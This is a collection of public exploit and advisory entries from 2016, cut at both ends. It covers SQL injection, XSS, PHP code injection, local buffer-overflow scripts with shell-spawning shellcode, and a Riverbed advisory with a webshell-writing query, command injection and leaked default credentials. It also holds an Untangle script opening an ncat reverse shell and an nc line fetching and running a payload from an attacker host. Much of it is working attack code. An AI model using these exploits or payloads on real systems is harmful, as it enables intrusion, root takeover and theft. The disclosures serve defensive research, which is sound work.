		$pages_num = getZahlPage($_GET['id2'], 'unterkategorie');
	}
	else{
		$pages_num = getZahlPage($_GET['id'], 'kategorie');
	}

	$page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1;
	$pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : '';
	echo $pages;
}


######################

# PoC Exploit:

http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a

# Exploit Code via sqlmap:

sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast

Parameter: id2 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN
---

###################### Cross Site Scripting Vulnerability ######################

# PoC Exploit:

Search: "><script>alert('n4tural');</script>

http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0

######################
            
iBilling v3.7.0 Multiple Stored and Reflected Cross Site Scripting Vulnerabilities


Vendor: iBilling
Product web page: http://www.ibilling.io/
Affected version: 3.7.0

Summary: The features you want, the simplicity you need! Beautifully 
designed for best User Interface & User Experience. The software 
That Works For YOUR Business! Get growing – with affordable, scalable 
business software. Find innovative ways to manage customers data, 
communicate with customer, know your business cashflow, net worth, 
send invoice to customer Hassle-free with single click payment reminder, 
payment confirmations & get paid online integrated with payment gateways.

Desc: iBilling suffers from multiple cross-site scripting vulnerabilities. 
The issue is triggered when input passed via multiple parameters is not 
properly sanitized before being returned to the user. This can be exploited 
to execute arbitrary HTML and script code in a user's browser session in 
context of an affected site.


Tested on: nginx
	       PHP/5.5.9-1ubuntu4.6


Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
                            @zeroscience


Advisory ID: ZSL-2016-5332
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5332.php



08.06.2016


1. Cross Site Scripting (Stored):

http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)

Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Reflected):

http://localhost/ibilling/index.php
Parameters: cid (POST)

Payload(s):
cid=1001"><script>alert(1)</script>&msg=&icon=

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
            
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: PInfo - File viewer
# Version: 0.6.9-5.1
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description:  An alternative info-file viewer
# pinfo is an viewer for Info documents, which is based on ncurses.
# Kali Linux 2.0 package: pool/main/p/pinfo/pinfo_0.6.9-5.1_i386.deb
# MD5sum: 9487efb0be037536eeda31b588cb6f89
# Website:http://pinfo.alioth.debian.org/
#
# $ run -m `python -c 'print "A"*564+"DCBA"'`
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
#  EAX: 0x00000002  EBX: 0xB7F0B000  ECX: 0x00004554  EDX: 0x00000100
# o d I t s z a P c
#  ESI: 0x41424344  EDI: 0x00004554  EBP: 0xBFFFF4A4  ESP: 0xBFFFEF30
# EIP: 0xB7D92832
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7d92832 <__GI_getenv+114>:    cmp    di,WORD PTR [esi]
#   0xb7d92835 <__GI_getenv+117>:    jne    0xb7d92828 <__GI_getenv+104>
#   0xb7d92837 <__GI_getenv+119>:    mov    eax,DWORD PTR [esp+0x14]
#   0xb7d9283b <__GI_getenv+123>:    mov    DWORD PTR [esp+0x8],eax
#   0xb7d9283f <__GI_getenv+127>:    mov    eax,DWORD PTR [esp+0x18]
#   0xb7d92843 <__GI_getenv+131>:    mov    DWORD PTR [esp+0x4],eax
#   0xb7d92847 <__GI_getenv+135>:    lea    eax,[esi+0x2]
#   0xb7d9284a <__GI_getenv+138>:    mov    DWORD PTR [esp],eax
# --------------------------------------------------------------------------------
#
#  gdb$ x/100x $esp
# 0xbffff250:    0xbffff49c    0x00000003    0x00000001    0x00000002
# 0xbffff260:    0xb7d6ebf8    0xb7fe78bd    0xb7d74ffd    0x41049384
# 0xbffff270:    0x41414141    0x41414141    0x41414141    0x41414141
# 0xbffff280:    0x41414141    0x41414141    0x41414141    0x41414141
# 0xbffff290:    0x41414141    0x41414141    0x41414141    0x41414141
# 0xbffff2a0:    0x41414141    0x41414141    0x41414141    0x41414141
# 0xbffff2b0:    0x41414141    0x41414141    0x41414141    0x41414141

import os, subprocess, sys, errno

def run():
  try:
    print "# PInfo File Viewer - Local Buffer Overflow by Juan Sacco"
    print "# This Exploit has been developed using Exploit Pack"
    # NOPSLED + SHELLCODE + EIP

    buffersize = 564
    nopsled = "\x90"*200
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    eip = "\x40\xf3\xff\xbf"
    # sled + shellcode padded out to buffersize, then the saved return address
    buffer = nopsled + shellcode + "A" * (buffersize - len(nopsled) - len(shellcode)) + eip
    # program and its argument must be separate argv entries
    subprocess.call(["pinfo", "-m", buffer])

  except OSError as e:
    if e.errno == errno.ENOENT:
        print "Sorry, PInfo File Viewer - Not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit PInfo 0.6.9-5.1 Local Overflow Exploit"
    print "Author: Juan Sacco - Exploit Pack"
  except IndexError:
    howtousage()
  run()
            
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs:  SQL Injection
Author: Mehmet Ince
Date found: 27 Jun 2016


2. CREDIT
========================================
These vulnerabilities were identified during an external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.

Netsparker was used for initial detection.

3. DETAILS
========================================

The following code shows that the $page variable is used inside an SQL query
without proper escaping or PDO.

File : /core/inc/bigtree/admin.php

Lines 6866 - 6879

function submitPageChange($page,$changes) {
    if ($page[0] == "p") {
        // It's still pending...
        $type = "NEW";
        $pending = true;
        $existing_page = array();
        $existing_pending_change = array("id" => substr($page,1));
    } else {
        // It's an existing page
        $type = "EDIT";
        $pending = false;
        $existing_page = BigTreeCMS::getPage($page);
        $existing_pending_change = sqlfetch(sqlquery("SELECT id FROM bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id = '$page'"));
    }
    ...
}


The submitPageChange function is therefore vulnerable to SQL injection.
It is called from two places in the code base; the following list shows
the callers.

/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php


PoC:

Following HTTP POST request was used in order to exploit the SQL Injection
flaw.

POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
bigtree_admin[email]=mehmet%40mehmetince.net;
bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106

--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"

success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"

Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"

trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"

Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"

3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"


--b788b047b8e345b792cdc1f81fef2106--


4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull Request has been sent.

https://github.com/bigtreecms/BigTree-CMS/pull/256

-- 
Sr. Information Security Engineer
https://www.mehmetince.net
            
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: HNB - Organizer
# Version: 1.9.18-10
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description:  Hnb is an ncurses program to organize many
# kinds of data in one place, for example addresses, todo lists, ideas,
# book reviews or to store snippets of brainstorming.
# Kali Linux 2.0 package: pool/main/h/hnb/hnb_1.9.18-10_i386.deb
# MD5sum: 1e1ff680f6e94a1a28ca85eeb3ea6aa0
# Website:http://hnb.sourceforge.net/
#
# gdb$ run -rc `python -c 'print "A"*108'`
# Starting program: /usr/bin/hnb -rc `python -c 'print "A"*108'`
# *** buffer overflow detected ***: /usr/bin/hnb terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7e14773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7ea4b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb7ea2c3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7ea2127]
# /usr/bin/hnb[0x8049669]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb7dc1a63]
# /usr/bin/hnb[0x804a2d9]
# ======= Memory map: ========
# 08048000-0806e000 r-xp 00000000 08:01 2253992    /usr/bin/hnb
# 0806e000-0806f000 r--p 00025000 08:01 2253992    /usr/bin/hnb
# 0806f000-08070000 rw-p 00026000 08:01 2253992    /usr/bin/hnb
# 08070000-080b1000 rw-p 00000000 00:00 0          [heap]


import os, subprocess, sys  # sys is needed by howtousage() below

def run():
  try:
    print "# HNB Organizer - Local Buffer Overflow by Juan Sacco"
    print "# This Exploit has been developed using Exploit Pack"
    # NOPSLED + SHELLCODE + EIP

    buffersize = 108
    nopsled = "\x90"*40
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    eip = "\x40\xf3\xff\xbf"
    buffer = nopsled * (buffersize-len(shellcode)) + eip
    subprocess.call(["hnb -rc",' ', buffer])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, HNB File Viewer - Not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit HNB 1.9.18-10 Local Overflow Exploit"
    print "Author: Juan Sacco - Exploit Pack"
  except IndexError:
    howtousage()
run()
            
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------


[-] Software Link:

http://www.sugarcrm.com/


[-] Affected Versions:

Version 6.5.18 CE and prior versions.


[-] Vulnerabilities Description:

1) The vulnerable code is located in the /include/utils/array_utils.php script (lines 99-114):

	function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
		if (is_array($value)) {
			$str = '';
			$newArrayName = $array_name . "['$value_name']";
			foreach($value as $key=>$val) {
				$str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
			}
			return $str;
		} else {
			if(!$save_empty && empty($value)){
				return;
			}else{
				return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
			}
		}
	}

The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:

http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1


2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script (lines 117-120):

	$manifest_file = extractManifest($tempFile);

	if(is_file($manifest_file)) {
	    require_once( $manifest_file );

The vulnerability is caused by the Upgrade Wizard module, which allows uploading a package with an arbitrary manifest.php
file that will be executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.


[-] Solution:

Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.


[-] Disclosure Timeline:

[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-05
            
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7

PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf

+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.

+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘username’ POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the application’s
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.

The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the ‘users’
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).

[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {
  "username": "test%';INSERT INTO users (username, password, uid) VALUES
(<user>, <SHA512 hash>, <random id>);--",
  "password": ""
}

Additional SQL Injection vulnerabilities exist in the application’s web
interface and can be exploited after authentication.

Method        => GET
URL         => /popup.php?page=export_report
Parameter     => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--

Method        => GET
URL         => /popup.php?page=algorithm_settings
Parameter     => id
POC Payload => 1';SELECT PG_SLEEP(5)--   

Method        => POST
URL         => /index.php?page=port_config
Parameter     => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND
('Pdyu'='Pdyu   

Method        => POST
URL         => /index.php?page=port_config
Parameter     => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272

Method        => POST
URL         => /index.php?page=port_config
Parameter     => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--

All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.

[POC SQL INJECTION - WRITE WEBSHELL]   
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3


==Command Injection==
Multiple command injection vulnerabilities exist in the appliances’ web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.

URL         => GET
/popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter   => device
POC Payload => 1; touch /tmp/FILE;

URL         => POST /index.php?page=licenses
Body        => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter   => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes        => Token Request functionality in 'Licenses' page

URL         => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter   => query
POC Payload => 1; touch /tmp/MYFILE;

URL         => POST /index.php?page=network_config
Body        => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter   => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes        => 'Configure now' functionality, injection occurs after
appliance reboots.

URL         => POST /index.php?page=product_info
Body        => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter   => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes        => 'Delete collected entry' functionality

==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The ‘apache’ user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:

/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*

The ‘mazu-run’ script can be used to invoke the /bin/date binary in the
context of the built-in ‘mazu’ user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the -f flag against a sensitive
file such as the root private SSH key. The ‘-f’ option instructs the
‘date’ binary to parse the file specified as a DATEFILE. By default, the
command ‘date’ will echo back an error message with the contents of the
specified file when this does not comply with a valid DATEFILE format.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish an SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.

[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
 -o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';

==Local File Inclusion==
A local file inclusion vulnerability exists in the
‘sensor/ta_loader.php’ file due to a lack of input sanitization for the
GET parameter ‘class’. This allows an attacker to read or include
arbitrary files.

As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the ‘Edit
/etc/hosts’ functionality available under
‘/index.php?page=network_config’ to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.

[POC LFI]
curl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts

==Account Hijacking==
The password change functionality under the
‘/index.php?page=security_compliance’ page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the ‘accountscredentialsid’ hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.

This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out client-side against the
‘oldpassword’ field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length.  Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the ‘oldpassword’ hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.

After clicking the ‘Configure Now’ button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.

==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.

Users        =>    mazu, dhcp, root
Password =>    bb!nmp4y

The default ‘mazu’ user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.

+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.

At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter ‘originalsettingsid’ when
browsing to ‘/index.php?page=security_compliance’.

+------------+
|  Timeline  |
+------------+
24/03/2016 – Initial disclosure to Riverbed.
25/03/2016 – Vendor confirms receipt of advisory.
18/04/2016 – Sent follow up email asking for a status update
19/04/2016 – Vendor replies engineering team is working on software patches.
13/06/2016 – Vendor releases patched software build.
27/06/2016 – Public Disclosure

+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
            
#!/usr/bin/python

# Title:       Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE:        (Not yet assigned)
# Discovery:      Matt Bush (@3xocyte)
# Exploit:      Matt Bush
# Contact:      mbush@themissinglink.com.au

# Disclosure Timeline:
# 22/4/2016      Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016      No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016      US-CERT confirms contacting vendor
# 16/6/2016      US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016       Public disclosure

# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous 
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).

# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.

import json, requests, sys

if len(sys.argv) < 5:
  print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
  print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
  sys.exit()

print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
print "                          by @3xocyte\n"

rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]

login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}

print "[*] Opening session..."
session = requests.Session()

print "[*] Authenticating..."
try:
  login = session.post(login_url, data=auth)
  get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
  req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
  data = json.loads(req_nonce.text)
  nonce = data['result']
except:
  print "[!] Authentication failed. Quitting."
  sys.exit()

print "[*] Getting execManager objectID..."
try:
  get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
  req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
  data = json.loads(req_obj_id.text)
  object_id = data['result']['execManager']['objectID']

except:
  print "[!] Could not get execManager objectID. Quitting."
  sys.exit()

print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
try:
  exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
  session.post(rpc_url, data=json.dumps(exploit))
except:
  print "[!] Exploit failed. Quitting."
  sys.exit()

print "[*] Exploit sent!"
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814

The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.

.text:00023D91 31 C0                          xor     eax, eax
...
.text:00023DAE 8D 95 E4 FB FF+                lea     edx, [ebp+var_41C]
.text:00023DB4 89 D7                          mov     edi, edx
.text:00023DC7 66 B9 00 01                    mov     cx, 100h
.text:00023DCB F3 AB                          rep stosd

We can see from this initialization that var_41C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:

.text:0002442C 88 0C 10                       mov     [eax+edx], cl ; eax = &var_41C edx=index
.text:0002442F 83 C2 01                       add     edx, 1 ; edx++
...
.text:00024408 81 FA 00 10 00+                cmp     edx, 1000h ; if (index > 4096) ...
.text:0002440E 0F 84 E9 02 00+                jz      loc_246FD ; oob

The index is checked against 4096 bytes, which is incorrect: the buffer it indexes is only 1024 bytes. This is most likely a simple programmer's error, bounds checking with the wrong size.

This code is typically run with SYSTEM/root privileges. I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
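To make the size mismatch concrete, here is an added C model of the loop described above. It is not Symantec's code: the names LZH_NAME_BUF and WRONG_LIMIT, the helper functions and the 2000-byte sample field are my own, with the two constants taken from the 0x100-dword initialisation and the 0x1000 comparison in the disassembly. The first function reports, from a field length alone, whether the original check would let the copy run past the 1024-byte buffer (no memory is written); the second is the destination-bounded copy a fix would use instead.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
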